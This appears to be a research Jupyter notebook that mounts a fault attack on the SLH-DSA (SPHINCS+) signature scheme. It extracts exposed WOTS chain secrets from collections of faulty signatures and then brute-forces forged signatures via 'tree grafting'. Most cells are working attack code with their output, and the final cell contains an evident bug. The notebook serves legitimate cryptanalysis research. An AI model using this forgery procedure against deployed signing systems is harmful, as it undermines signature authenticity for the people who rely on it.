# Config

In [1]:
base = "../"
#base = "../victims/sphincsplus/ref/"
keys_file = base + "keys.txt"
sigs_file = base + "sigs.txt"
sigs_simulated_file = base + "sigs_simulated.txt"

params = 'SLH-DSA-SHAKE-256s'

sanity_check = False
simulate_faults = True
filter_sigs  = True

# Setup

Install dependencies, define some helper functions

In [2]:
%pip install -r requirements.txt
!python --version

Note: you may need to restart the kernel to use updated packages.
Python 3.10.12


In [3]:
import fips205

In [4]:
slh = fips205.SLH_DSA(params)
a = slh.a
d = slh.d
hp = slh.hp
n = slh.n
k = slh.k

In [5]:
def print_adrs(adrs: fips205.ADRS, end='\n', verbose=False):
    hex = adrs.adrs().hex()
    if verbose:
        print('LAYER' + ' ' * 4 + 
              'TREE ADDR' + ' ' * 18 +
              'TYP' + ' ' * 6 +
              'KADR' + ' ' * 5 +
              'PADD = 0')
    print(' '.join([hex[i:i+8] for i in range(0, len(hex), 8)]), end=' ')
    print(end=end)

In [6]:
from os import cpu_count


def extract_wots_keys(pk: bytes, sigs: list[bytes]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    import multiprocessing
    from cryptanalysis_lib import process_sig
    wots_bytes = slh.len * n
    xmss_bytes = hp * n
    fors_bytes = k * (n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    with multiprocessing.Pool(processes=cpu_count()-2) as pool:
        args = [(params, pk, sig_idx, sig, sig_len) for sig_idx, sig in enumerate(sigs)]
        results = pool.map(process_sig, args)
    
    # Merge results
    merged = {}
    for item in results:
        merged = merge_groups(merged, item)
    return merged

def merge_groups(left: dict[fips205.ADRS, set], right: dict[fips205.ADRS, set]) -> dict[fips205.ADRS, set]:
    for key, items in right.items():
        if key not in left:
            left[key] = set()
        left[key] = left[key] | items
    return left


In [7]:
from typing import Generator


def shared_intermediates(v1: fips205.WOTSKeyData, valid: fips205.WOTSKeyData) -> Generator[tuple[int, int], None, bool]:
    if not v1.intermediates or not valid.intermediates:
        return False
    if v1 == valid:
        return False
    retval = False
    for chain_idx, chain in enumerate(v1.intermediates):
        if not chain:
            continue
        for hash_iter, step in enumerate(chain[1:], start=1):
            if step == valid.sig[chain_idx*n:(chain_idx+1)*n]:
                retval = True
                yield (chain_idx, hash_iter)
    return retval
    

def find_collisions(wots_sigs: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    return {adrs: keys for adrs, keys in wots_sigs.items() if len(keys) > 1}

def print_arr_w(arr: list[int], width=int):
    print('[ ', end='')
    for x in arr:
        print(f"{x:0{width}d}", end=' ')
    print(']')
    
def valid_sigs_d(groups):
    return {adrs: key for adrs, keys in groups.items() for key in keys if key.valid}

def hex(s: bytes | None) -> str:
    return s.hex() if s else "None"

def print_key_data(v: fips205.WOTSKeyData, adrs: fips205.ADRS, pk_seed: bytes, valid_key: fips205.WOTSKeyData = None, indent=''):
    print(indent + ("Valid" if v.valid else "Invalid" if v.valid == False else "--"), end='\t')
    print(indent + v.sig.hex()[:128] + '...')
    print(indent + '\tPK (from tree)\t' + hex(v.pk))
    pk = v.calculate_pk(params, adrs, pk_seed)
    print(indent + '\tPK (calculated)\t' + hex(pk))
    print(indent + f"\tWOTS key is part of signature {v.sig_idx}")
    print(indent + '\t\t\t', end='')
    print_arr_w([i for i in range(len(v.chains))], 2)
    print(indent + '\t' + "chains\t\t", end='')
    print_arr_w(v.chains, 2)
    print(indent + '\t' + "chains (calc)\t", end = '')
    print_arr_w(v.chains_calculated, 2)
    if valid_key and not v.valid:
        for chain_idx, exposed in shared_intermediates(v, valid_key):
            print(indent + f"\t\tExposed {exposed} secret values at chain_idx {chain_idx}")
    

def print_groups(pk_seed: bytes, groups: dict[fips205.ADRS, list[fips205.WOTSKeyData]], skip_no_exposed=True):
    #collisions: list[tuple[fips205.ADRS, set[fips205.WOTSKeyData]]] = [(adrs, value) for adrs, value in collisions if any(v.valid for v in value) and not all(v.valid for v in value)]
    #print(f"Found {len(collisions)} groups with at least one valid and one invalid key")
    # collisions where PK match. This is not necessary. Better: find exposed keys by running WOTS chain
    """collisions = [
        (adrs, value)
        for adrs, value in collisions
        if any(v1.msg != v2.msg and v1.pk == v2.pk for v1 in value for v2 in value if v1.valid and not v2.valid)
    ]"""
    
    valid_sigs = valid_sigs_d(groups)

    # sort by layer address
    groups = sorted(groups.items(), key=lambda item: item[0].get_layer_address())
    
    for adrs, value in groups:
        valid_sig = valid_sigs[adrs] if adrs in valid_sigs else None
        invalid_sigs = [v for v in value if not v.valid]
        print_adrs(adrs, end='', verbose=True)
        print(len(value))
        
        for v in [valid_sig] + invalid_sigs:
            if not v:
                continue
            if skip_no_exposed and not v.valid and not shared_intermediates(v, valid_sig):
                continue
            print_key_data(v, adrs, pk_seed, valid_sig, indent='\t')

# Clean Start

Run this cell (and below) for a clean analysis

In [8]:
processed_sigs = 0
groups: dict[fips205.ADRS, set[fips205.WOTSKeyData]] = {}

In [9]:
# Load keys
with open(keys_file, "r") as f:
    lines = [s.split(': ') for s in f.readlines()]
    keys = {s[0]: bytes.fromhex(s[1].strip()) for s in lines}
sk = keys['sk']
pk = keys['pk']
pk_seed = pk[:n]
pk.hex()

'0bc005bdb4dfb431bb250e109ca4430d42f4fd7e9270f515640701df308413952d854a500f3e893a8804ad88a600ee6812c3317e422848c5854c2b18588c1b9a'

# Update Experiment
Run this cell (and below) to process new signatures

# Load real signatures

This loads the real signatures from `sigs_file` (see config)

In [10]:
with open(sigs_file, "r") as f:
    sigs = [bytes.fromhex(s.strip()) for s in f.readlines()]
    # sigs = sigs[:1000]
print(f"Loaded {len(sigs)} signatures")

Loaded 29065 signatures


# Load simulated faulty signatures
This section loads simulated faults from `sigs_simulated_file`

In [11]:
import os
if simulate_faults and os.path.exists(sigs_simulated_file):
    with open(sigs_simulated_file, "r") as f:
        faulty_sigs = [bytes.fromhex(s.strip()) for s in f.readlines()]
    print(f"Loaded {len(faulty_sigs)} faulty (simulated) signatures")
    simulated_groups = extract_wots_keys(pk, faulty_sigs)
    for adrs, keys in simulated_groups.items():
        for key in keys:
            key.simulated = True
    print_groups(pk_seed, simulated_groups)
    groups = merge_groups(groups, simulated_groups)
else:
    print("Fault simulation disabled or no simulated faulty signatures found")

Fault simulation disabled or no simulated faulty signatures found


# Tooling sanity check

This section tries to generate a signature using the same key and randomization values as the first signature in `sigs_file`.
We expect them to match. This assumes that the first signature in `sigs_file` is a valid signature.

In [12]:
if sanity_check:
    wots_len = slh.len
    wots_bytes = wots_len * n
    xmss_bytes = hp * n
    fors_bytes = k*(n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    sig = sigs[0]

    m = sig[sig_len:]
    r = sig[:n]
    pysig = slh.slh_sign_internal(m, sk, None, r=r)
    pysig += m

    if pysig != sig:
        print("Signature mismatch")
        print(pysig.hex())
        print(sig.hex())
    print("Passed sanity check")
else:
    print("Skipping sanity check")

Skipping sanity check


# Extract WOTS keys

Extract all WOTS keys in all signatures

In [13]:
if processed_sigs > 0:
    print(f"Skipping {processed_sigs} signatures")

sigs = sigs[processed_sigs:]
print(f"Processing {len(sigs)} signatures...", end=' ')

groups = merge_groups(groups, extract_wots_keys(pk, sigs))
print(f"Found {len(groups)} unique addresses")

# update processed_sigs for consecutive runs
processed_sigs += len(sigs)

Processing 29065 signatures... Found 198057 unique addresses


In [14]:
if False:
    # get distribution of steps in (valid) signatures
    distr = [[0 for _ in range(16)] for _ in range(67)]
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                for chain_idx, chain in enumerate(key.chains):
                        distr[chain_idx][chain] += 1           
    distr

    %pip install matplotlib
    import matplotlib.pyplot as plt

    # distr is your 67×16 list of counts
    # e.g. distr = [[…], …, […]]

    plt.figure(figsize=(8, 10))
    plt.imshow(distr, aspect='auto')        # default colormap
    plt.colorbar(label='Count')              # show scale
    plt.xlabel('Step value (0–15)')
    plt.ylabel('Chain index (0–66)')
    plt.title('Distribution of steps in valid signatures')
    plt.tight_layout()
    plt.show()

# Group Collisions

...appear here!

In [15]:
# sanity check for multiple valid keys
for adrs, keys in groups.items():
    if len([v for v in keys if v.valid]) > 1:
        print("ERROR: found multiple valid keys for the same address", adrs, keys)
        raise ValueError("Multiple valid keys for the same address")

In [16]:
# maintain a dictionary of valid signatures per adrs
valid_sigs = valid_sigs_d(groups)

In [17]:
# only keep keys at layer 7
groups = {adrs: sigs for adrs, sigs in groups.items() if adrs.get_layer_address() == 7}
groups = {adrs: sigs for adrs, sigs in groups.items() if len(sigs) > 0}
print(f"Found {len(groups)} groups at layer 7")

# only keep keys where we also observered valid signatures
groups = {adrs: sigs for adrs, sigs in groups.items() if adrs in valid_sigs}
groups = {adrs: sigs for adrs, sigs in groups.items() if len(sigs) > 0}
print(f"Found {len(groups)} groups with valid signatures")

# only keep collisions
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with collisions")



Found 256 groups at layer 7
Found 217 groups with valid signatures
Found 217 groups with collisions


In [18]:
# post-process collided WOTS keys
for adrs, keys in groups.items():
    if adrs not in valid_sigs:
        continue
    valid_sig = valid_sigs[adrs]
    for key in keys:
        key.calculate_intermediates(params, adrs, pk_seed, valid_sig)

In [19]:
# filter out all-7 sigs
all_7_indices = set()
for adrs, keys in groups.items():
    keys_c = keys.copy()
    for i, key in enumerate(keys_c):
        if all(c == 7 for c in key.chains_calculated):
            all_7_indices.add(key.sig_idx)
            #keys.remove(key)
            

with open("sigs_wots7.txt", "w") as f:
    for idx in sorted(all_7_indices):
        f.write(f"{sigs[idx].hex()}\n")

# filter out signatures containing no WOTS secrets
groups = {adrs: [sig for sig in sigs if any(i < 17 for i in sig.chains_calculated)] for adrs, sigs in groups.items()}
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with at least one WOTS secret")

Found 217 groups with at least one WOTS secret


In [20]:
print_groups(pk_seed, groups, skip_no_exposed=False)

LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 0000002b 00000000 00000000 2
	Valid		8797b34b522d6e3841fc234a812f0dd028f525e1592594a4f69213357783a549c6364740b2d78c38e2ba8c1562a1c67854a1d01233c07d6b921df2249e88ffcb...
		PK (from tree)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		PK (calculated)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		WOTS key is part of signature 0
				[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
		chains		[ 00 11 05 09 09 10 01 14 15 03 01 00 05 12 09 06 08 12 10 14 09 02 15 00 08 15 06 14 07 10 02 04 09 11 06 06 05 09 02 05 14 08 13 09 03 07 11 00 12 05 00 04 14 14 07 05 09 15 10 10 06 05 02 06 01 13 08 ]
		chains (calc)	[ 00 11 05 09 09 10 01 14 15 03 01 00 05 12 09 06 08 12 10 14 09 02 15 00 08 15 06 1

In [21]:
def filter_signatures(sigs: list[bytes], wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> set[bytes]:
    filtered_sigs = set()
    collisions = find_collisions(wots_keys)
    collisions = {adrs: sigs for adrs, sigs in collisions.items() if any(sig.valid for sig in sigs) and not all(sig.valid for sig in sigs)}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in collisions.items():
        for key in keys:
            if key.valid:
                # keep valid keys
                filtered_sigs.add(sigs[key.sig_idx])
            if adrs in valid_sigs and shared_intermediates(key, valid_sigs[adrs]):
                filtered_sigs.add(sigs[key.sig_idx])
    return filtered_sigs

if filter_sigs:
    # only keep signatures that are valid or have exposed WOTS keys
    filtered_sigs = filter_signatures(sigs, groups)
    print(f"Kept {len(filtered_sigs)} of {len(sigs)} signatures")
    with open("../sigs_filtered.txt", "w") as f:
        for sig in filtered_sigs:
            f.write(sig.hex() + "\n")

Kept 446 of 29065 signatures


In [22]:
# filter groups with exposed WOTS secrets
groups = {adrs: sigs 
    for adrs, sigs in groups.items()
    if any(not sig.valid and shared_intermediates(sig, valid_sigs[adrs]) for sig in sigs)
}
print(f"Found {len(groups)} groups with exposed WOTS secrets")
print_groups(pk_seed, groups)

Found 217 groups with exposed WOTS secrets
LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 0000002b 00000000 00000000 2
	Valid		8797b34b522d6e3841fc234a812f0dd028f525e1592594a4f69213357783a549c6364740b2d78c38e2ba8c1562a1c67854a1d01233c07d6b921df2249e88ffcb...
		PK (from tree)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		PK (calculated)	13393bc727a76013b660472a93cad37bb7c14d238ca67e4e5eb24df2b085f716
		WOTS key is part of signature 0
				[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
		chains		[ 00 11 05 09 09 10 01 14 15 03 01 00 05 12 09 06 08 12 10 14 09 02 15 00 08 15 06 14 07 10 02 04 09 11 06 06 05 09 02 05 14 08 13 09 03 07 11 00 12 05 00 04 14 14 07 05 09 15 10 10 06 05 02 06 01 13 08 ]
		chains (calc)	[ 00 11 05 09 09 10 01 14 15 03 01 00 05 

In [23]:
# Join WOTS keys to get a WOTS key usable for signing as many messages as possible
from copy import deepcopy

def join_sigs(wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]], params, pk_seed) -> dict[fips205.ADRS, fips205.WOTSKeyData]:
    joined_sigs = {}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in wots_keys.items():
        if len(keys) < 2:
            continue
        retval = deepcopy(valid_sigs[adrs])
        if not retval.chains_calculated:
            print_adrs(adrs)
            retval.calculate_intermediates(params, adrs, pk_seed, valid_sigs[adrs])
        for key in keys:
            retval = retval.join(key, params)
        joined_sigs[adrs] = retval
    return joined_sigs

joined_sigs = join_sigs(groups, params, pk_seed)
print(f"Joined {len(joined_sigs)} signatures")

"""
for adrs, key in joined_sigs.items():
    print_adrs(adrs, verbose=True)
    print_key_data(key, adrs, pk_seed, None)
"""

# Filter out signatures with unresolved chains
joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if all(c < slh.w for c in key.chains_calculated)}

print(f"Filtered {len(joined_sigs)} (unresolved chains)")

# Filter out signatures with all chains set to 0
joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if any(c > 0 for c in key.chains_calculated)}
print(f"Filtered {len(joined_sigs)} (wildcard chains)")

Joined 217 signatures
Filtered 217 (unresolved chains)
Filtered 216 (wildcard chains)


In [24]:
# Find the key where the maximum number of chains are exposed (i.e., valid_sig.chain[i] - c is maximized for all chains 0 <= i < len)
def score(key: fips205.WOTSKeyData) -> int:
    return sum(slh.w - c for c in key.chains_calculated)
most_exposed_adrs, most_exposed_key = max(
    joined_sigs.items(),
    key=lambda item: score(item[1]))
print("Key with most exposed chains (score: {}):".format(
    score(most_exposed_key)
))
print_adrs(most_exposed_adrs, verbose=True)
print_key_data(most_exposed_key, most_exposed_adrs, pk_seed, None)

# try to sign the original message with the exposed key
print("Signing original (valid) msg with exposed key...")
assert most_exposed_key.try_sign(most_exposed_key.chains, most_exposed_adrs, pk_seed, params)

# signing message with same checksum
# Find two offsets i, j where the chain is partially exposed
exposed_offsets = [(idx, c - cc) for idx, (c, cc) in enumerate(zip(most_exposed_key.chains[:slh.len1], most_exposed_key.chains_calculated[:slh.len1])) if abs(c - cc) > 0]
if len(exposed_offsets) >= 2:
    i, j = exposed_offsets[:2]
    print(f"Found exposed offsets: i={i}, j={j}")
    chains = most_exposed_key.chains_calculated.copy()[:slh.len1]
    chains[i[0]] += 1
    print("Signing modified message with exposed key...")
    assert most_exposed_key.try_sign(chains, most_exposed_adrs, pk_seed, params)
else:
    print("Not enough exposed offsets found")
    
# forge a signature
msg = most_exposed_key.chains_calculated.copy()

print("="*64)
print("All keys for exposed address:")
print_adrs(most_exposed_adrs, verbose=True)
for key in groups[most_exposed_adrs]:
    print_key_data(key, most_exposed_adrs, pk_seed, valid_sigs[most_exposed_adrs])


Key with most exposed chains (score: 829):
LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 0000005b 00000000 00000000 
--	cb9a72b7e655acde6a0fa8545cfabbabffbef2f34908952d4b320ce2e8cde04013213d4e537e21572438143435634d8ae5040c1ec592bd8b712aef7f0772ad6b...
	PK (from tree)	None
	PK (calculated)	bb9b9cbe05bdbf04d45c5787f71c96d2d143a26aae565ecb4aed828345fc04d2
	WOTS key is part of signature None
			[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
	chains		[ 07 02 08 06 04 03 11 03 09 02 07 09 09 12 10 04 05 02 08 07 05 04 04 02 00 06 15 00 15 07 06 13 05 10 14 00 13 02 00 12 10 11 01 15 05 13 15 03 12 00 05 15 08 08 04 07 10 03 14 14 02 14 11 15 01 14 04 ]
	chains (calc)	[ 07 02 07 06 04 03 06 03 07 02 04 07 07 07 07 04 05 02 07 07 05 04 01 01 00 00 00 00 05 00 06 07 05 01 07 00 

In [25]:
# calculate number of signinable messages (without checksum)
import math


def num_signable_messages(key: fips205.WOTSKeyData) -> int:
    num_sign = 1
    for i in range(slh.len1):
        if key.chains_calculated[i] < slh.w - 1:
            num_sign *= (slh.w - 1 - key.chains_calculated[i])
    return num_sign/(slh.w-1)**slh.len1
num_signable = num_signable_messages(most_exposed_key)
expected_reps = 1/num_signable
print(f"Fraction of signable messages: {num_signable}")
print(f"Expected number of repetitions until a valid signature is found: 2**{math.log2(expected_reps)}")
if expected_reps > 2**30:
    raise ValueError("Expected repetitions are too high, aborting")

Fraction of signable messages: 1.7278451120710122e-09
Expected number of repetitions until a valid signature is found: 2**29.10837895712278


In [26]:
# sign a random message with the exposed key
msg = bytes.fromhex('bc9c6c7892ac9aa558a7ee5ef40a50bed3796a3cc657e88c6cedec7ddffbdad2')
most_exposed_key.try_sign(msg, most_exposed_adrs, pk_seed, params)

b'\xf0\xb1\x12\x05\xac\xdf\x98\xb2\xcb3\xec\x1d\x93x\x80\xa2\x86\x07\xf6\x82\xdeA\x8c%\x1fE\x8ce\xad\xe6\xc0\x17\x1c\xc49[@\xde\xe5\xcd\xe0M\xbf\xe3\xda\xbc\xcd\xa4E\x878\xf0w\xffI\x98L\xb8=\x90\xe4\xa8\xdd1\x8a\xdd\xfc\x12\x08I\x02\x92\xd0\x03&gO\xe0j\x1a\x86\x94\x8e)-j4\x1c\xda\xaap\xd6\x8a\xa3c\xff\xc0\x97E\x8a\xbf&_\x14|~\x0f1\xc1\xce\x047\xd7\xf7?~J\x9a\xb4\x90\xe1\x7fv\xa6\x8f\x16\x92\xdf\xbd\xaa\xec\xea-*\xec\x8b0f\xc6\x16,\xed\xfb\xb9\xf6\x87\xbc\xee\x9e\xa6W\xf3\x99#\x07\xd0\x12\x18\x9d\xa6\x9a\xe2t\x15\xd8\x89V\xf1m{\t\xff\xea\x07=X\xe6C\x1b\x97\xb6E0\x88sB\x11Eq\xfb`\x97wV\xb8\xed\xbd\x8a&\xacG\xdb\xccF\xee#\xce\xba(\xdc\x8a\x1b_\x92\xcc5\x81\x98\xd9\xff1\xda\xe8)\x13\x82\x7f\x10\x83\xa1K\xdd\xc1\\\xc2\xaa\xcb\x03\xe2\x18\x0b\x98p\xad\xfe\xf8\x0b\xb0m\x8e\xc4\x8cJ\xce\x1a`\x94\x99\xbfI\x13\xde\xc4|A\xf6b\xac\xd6Hy\x92qj\xbcQ\xadO\x81\xf5\x82\xea\xe3o\x10\xb6\xc4\x17r\x18Qsr\xa8|o\xab*\x19L\xf5\x00,$\x86\x96\x00OW\xc6\x1c\xf2&\x165\xd4\x18\xfe\xb6\xe2D\xf3X\xa5\'[E\xfc2\xac+p

# Tree Grafting

In [27]:
from cryptanalysis_lib import sign_worker, sign_worker_xmss, sign_worker_xmss_c

In [32]:
%timeit sign_worker((100, most_exposed_adrs, most_exposed_key, pk_seed, params))

3.06 ms ± 12.1 μs per loop (mean ± std. dev. of 7 runs, 100 loops each)


In [29]:
%timeit sign_worker_xmss((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

573 ms ± 1.36 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)


In [None]:
%timeit sign_worker_xmss_c((100, most_exposed_adrs, most_exposed_key, pk_seed, params))

6.31 s ± 613 μs per loop (mean ± std. dev. of 7 runs, 1 loop each)


In [None]:
import math
from multiprocessing import Pool
from os import cpu_count
from cryptanalysis_lib import sign_worker_xmss

def sign_message_batch_mp(total_msgs, joined_sigs_items, pk_seed, params, num_procs=None):
    """
    Use a process pool to sign `total_msgs` messages *per* (adrs,key).
    Returns the first successful message signed by any process.
    """
    if num_procs is None:
        num_procs = cpu_count()

    # Split total_msgs into roughly equal chunks per process
    per_proc = math.ceil(total_msgs / num_procs)
    print("Total messages per process:", per_proc)

    # Build one work item per (process x key)
    work = []
    for adrs, key in joined_sigs_items.items():
        for _ in range(num_procs):
            work.append((per_proc, adrs, key, pk_seed, params))

    # Spawn the pool
    with Pool(processes=num_procs) as pool:
        # Check each result for success, cancel if any process returns a nonzero result
        for res in pool.map_async(sign_worker_xmss_c, work):
            if res:
                print(f"Success in process {idx} with {res} signatures.")
                break
    return(res)

num_sigs = 2**29

total_success = sign_message_batch_mp(num_sigs, {most_exposed_adrs: most_exposed_key}, pk_seed, params, num_procs=cpu_count()-2)

print("Total messages signed:", num_sigs)
print("Total successful signatures:", total_success)
print("Success ratio:", total_success/num_sigs)